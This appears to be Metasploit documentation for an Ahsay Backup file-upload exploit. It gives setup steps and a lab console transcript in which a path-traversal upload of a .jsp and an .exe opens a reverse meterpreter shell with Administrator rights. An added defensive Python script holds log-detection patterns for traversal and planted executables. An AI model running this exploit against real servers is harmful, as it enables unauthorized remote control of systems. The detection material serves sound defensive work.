
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md

## Vulnerable Application

Ahsay Backup v7.x - v8.1.1.50

Download the vulnerable version: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe

Start the application (I start it manually from `C:\Program Files\AhsayCBS\bin\startup.bat`).

## Verification Steps

  1. Start msfconsole
  2. `use exploit/windows/misc/ahsay_fileupload`
  3. Enable trial account creation: `set CREATEACCOUNT true`
  4. Set RHOST: `set RHOST 172.16.238.175`
  5. Set LHOST: `set LHOST 172.16.238.235`
  6. Run the exploit: `run`
  7. We should receive a meterpreter shell.

## Options

- `CREATEACCOUNT` - Create a trial account; use this when trial accounts are enabled and you do not have valid credentials.
- `PASSWORD` - Password for the Ahsay user account; if `CREATEACCOUNT` is set, this password will be used.
- `RHOST` - Target address.
- `RPORT` - The target port (TCP).
- `TARGETURI` - Path to the Ahsay installation.
- `UPLOADPATH` - Path to where the file should be uploaded.
- `USERNAME` - Username of the Ahsay account; if `CREATEACCOUNT` is set, this username will be used.

## Scenarios

### Ahsay 8.1.1.50 on Windows 2003 SP2

```
msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
CREATEACCOUNT => true
msf exploit(windows/misc/ahsay_fileupload) > set RHOST 172.16.238.175
RHOST => 172.16.238.175
msf exploit(windows/misc/ahsay_fileupload) > set LHOST 172.16.238.235
LHOST => 172.16.238.235
msf exploit(windows/misc/ahsay_fileupload) > run
[*] Started reverse TCP handler on 172.16.238.235:4444
[+] Username and password are valid!
[+] No need to create account, already exists!
[*] Uploading payload
[+] Successfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe
[*] Uploading payload
[+] Successfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp
[*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp
[+] Exploit executed!
[*] Sending stage (179779 bytes) to 172.16.238.175
[*] Meterpreter session 1 opened (172.16.238.235:4444 -> 172.16.238.175:1114) at 2019-07-16 14:59:45 +0200
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/lcofxnrzON.exe' on the target
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target
meterpreter > getuid
Server username: AHSAY-123\Administrator
```
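The output above leaves two traces a defender can check for: a `.jsp` (or `.exe`) fetched from the static `/cbs/help/en/` documentation tree, and an upload path carrying the `../../webapps/cbs/help/en/` traversal sequence. The following Python script is an added example and is not part of the Metasploit module or this documentation: it flags access-log requests that match either pattern, and lists files in the help directory whose extension is not static content, which is how the manual cleanup the module warns about can be verified. The log lines are constructed for this example, the `/cbs/upload` endpoint name in one of them is hypothetical (the page does not document Ahsay's upload endpoint), and the set of "static" extensions is an assumption about what a help tree normally contains.

```python
import os
import re
import tempfile

# Access log pattern (Common Log Format); the request line is split into
# method, target and protocol so the target can be inspected on its own.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Rule 1: /cbs/help/en/ is static documentation; a .jsp or .exe served from
# there matches the trigger request shown in the module output.
HELP_DIR_EXEC_RE = re.compile(r"^/cbs/help/en/.*\.(?:jsp|exe)$", re.IGNORECASE)

# Rule 2: directory-traversal sequences (plain, backslash and URL-encoded forms)
# anywhere in the request target, as in the ../../webapps/... upload path.
TRAVERSAL_RE = re.compile(r"\.\.(?:/|\\|%2f|%5c)|%2e%2e", re.IGNORECASE)

# Constructed sample log: hosts, file names and timestamps are made up to mirror
# the scenario above; /cbs/upload is a hypothetical endpoint name, not one
# documented for Ahsay.
SAMPLE_LOG = """\
172.16.238.235 - - [16/Jul/2019:14:59:40 +0200] "GET /cbs/help/en/index.html HTTP/1.1" 200 5120
172.16.238.235 - - [16/Jul/2019:14:59:44 +0200] "GET /cbs/help/en/myjnJMFlNi.jsp HTTP/1.1" 200 12
10.0.0.7 - - [16/Jul/2019:15:01:02 +0200] "GET /cbs/help/en/styles.css HTTP/1.1" 200 800
10.0.0.9 - - [16/Jul/2019:15:02:10 +0200] "POST /cbs/upload?path=..%2F..%2Fwebapps%2Fcbs%2Fhelp%2Fen HTTP/1.1" 200 0
"""


def detect(lines):
    """Return one finding per (line, rule) hit; lines that do not parse are skipped."""
    findings = []
    for number, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        path = target.split("?", 1)[0]          # rule 1 looks at the path only
        if HELP_DIR_EXEC_RE.match(path):
            findings.append({"line": number, "client": m.group("client"),
                             "rule": "executable-in-help-dir", "target": target})
        if TRAVERSAL_RE.search(target):         # rule 2 looks at path and query
            findings.append({"line": number, "client": m.group("client"),
                             "rule": "path-traversal", "target": target})
    return findings


# Assumed set of extensions found in a static help tree; anything else is
# reported so the manual cleanup the module warns about can be checked.
STATIC_EXTENSIONS = {".html", ".htm", ".css", ".js", ".png", ".gif", ".jpg", ".svg", ".ico"}


def find_foreign_files(help_dir):
    """Return sorted paths (relative to help_dir) whose extension is not static content."""
    foreign = []
    for root, _dirs, files in os.walk(help_dir):
        for name in files:
            if os.path.splitext(name)[1].lower() not in STATIC_EXTENSIONS:
                foreign.append(os.path.relpath(os.path.join(root, name), help_dir))
    return sorted(foreign)


def demo_scan():
    """Build a throwaway help directory with constructed file names and scan it."""
    with tempfile.TemporaryDirectory() as help_dir:
        for name in ("index.html", "styles.css", "myjnJMFlNi.jsp", "lcofxnrzON.exe"):
            with open(os.path.join(help_dir, name), "w") as fh:
                fh.write("placeholder\n")
        return find_foreign_files(help_dir)


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG.splitlines()):
        print(f"line {finding['line']}: {finding['rule']} from {finding['client']}: {finding['target']}")
    print("foreign files in help dir:", demo_scan())
```

Run `find_foreign_files` against the real `webapps/cbs/help/en` directory on the server rather than the temporary one `demo_scan` builds; the regex rules can be dropped into whatever log pipeline already reads the Ahsay web server's access log. Rule 2 is deliberately broad (any traversal sequence in any request), so expect to tune it if legitimate clients send `..` in query strings.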